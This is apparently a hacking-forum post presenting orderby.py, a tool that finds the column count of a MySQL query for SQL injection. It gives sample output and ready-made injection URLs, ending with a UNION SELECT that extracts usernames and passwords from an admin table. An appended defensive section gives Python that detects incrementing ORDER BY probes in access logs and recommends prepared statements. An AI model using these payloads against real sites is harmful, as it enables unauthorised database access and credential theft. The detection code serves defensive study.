The Web Local
 

 

 

Order By Tester

 

This is a simple tool for testing the column length in MySQL databases. It increments the ORDER BY index by 1 until it finds the error, then shows you the correct length.

 

It is available from here (registration required; I advise that you register and check regularly). It will also be available from the main site, http://darkc0de.com

 

In this example you can see that:

http://www.somesite.com/html/content.php?id= gives the error:

Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /var/www/vhosts/somesite/httpdocs/html/content.php on line 24

So we change the error setting in the Python script to mysql_fetch_assoc()

 

Note: Do not use "Warning:". It is in bold on the page, so the HTML markup around it would break the match.

When run, the script increments the column number until it gets this error, then subtracts 1 to give the column length.

d3hydr8@linuxbox:~> python orderby.py www.somesite.com/html/content.php?id=
[+] Testing: 1
[+] Testing: 2
[+] Testing: 3
[+] Testing: 4
[+] Testing: 5
 
        [!] Column Length Found: 4
        [!] Site: http://www.somesite.com/html/content.php?id=-1+order+by+4/*

Using the usual UNION SELECT statement with the above information gives you the required syntax to acquire the access you need:

 

http://www.somesite.com/html/content.php?id=-1+union+all+select+1,2,3,4/* or the usual

 

http://www.somesite.com/html/content.php?id=1+union+all+select+1,username,password,4+from+admin--
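
Seen from the server side, a run of this tool leaves a distinctive trail in the access log: one client requesting the same page with ORDER BY 1, 2, 3 and so on. The following Python is an added example, not part of the original post or of orderby.py; the log lines, IP addresses and function names are constructed for illustration, and a common/combined access-log format is assumed.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed access-log lines (not from a real server); IPs are documentation ranges.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2008:13:55:01 +0000] "GET /html/content.php?id=-1+order+by+1/* HTTP/1.1" 200 5120
203.0.113.7 - - [10/Oct/2008:13:55:01 +0000] "GET /html/content.php?id=-1+order+by+2/* HTTP/1.1" 200 5120
203.0.113.7 - - [10/Oct/2008:13:55:02 +0000] "GET /html/content.php?id=-1%20ORDER%20BY%203/* HTTP/1.1" 200 5120
203.0.113.7 - - [10/Oct/2008:13:55:02 +0000] "GET /html/content.php?id=-1+order+by+4/* HTTP/1.1" 200 5120
203.0.113.7 - - [10/Oct/2008:13:55:03 +0000] "GET /html/content.php?id=-1+order+by+5/* HTTP/1.1" 200 611
198.51.100.4 - - [10/Oct/2008:13:56:10 +0000] "GET /search.php?q=order+by+2 HTTP/1.1" 200 900
198.51.100.4 - - [10/Oct/2008:13:56:12 +0000] "GET /html/list.php?sort=name&order=asc HTTP/1.1" 200 900
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) HTTP/[\d.]+"')
ORDER_BY_RE = re.compile(r"order\s+by\s+(\d+)")

def longest_run(values):
    """Return the longest run of consecutive integers in a sorted list."""
    best, cur = [], []
    for v in values:
        cur = cur + [v] if cur and v == cur[-1] + 1 else [v]
        if len(cur) > len(best):
            best = cur
    return best

def find_orderby_probes(log_text, min_run=3):
    """Flag (client, path) pairs that requested ORDER BY n for consecutive n."""
    seen = defaultdict(set)  # (client, path) -> ORDER BY indexes requested
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        path, _, query = target.partition("?")
        # Decode '+' and %xx first so encoded variants are matched as well.
        hit = ORDER_BY_RE.search(unquote_plus(query).lower())
        if hit:
            seen[(client, path)].add(int(hit.group(1)))
    findings = []
    for (client, path), values in sorted(seen.items()):
        run = longest_run(sorted(values))
        if len(run) >= min_run:
            findings.append((client, path, run))
    return findings

if __name__ == "__main__":
    for client, path, run in find_orderby_probes(SAMPLE_LOG):
        print(f"{client} probed {path} with ORDER BY {run[0]}..{run[-1]}")
```

A single ORDER BY in a search term is not flagged; only an incrementing run from one client against one path is. The underlying fix remains binding the id parameter through a prepared statement and turning off error display on the page.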

 
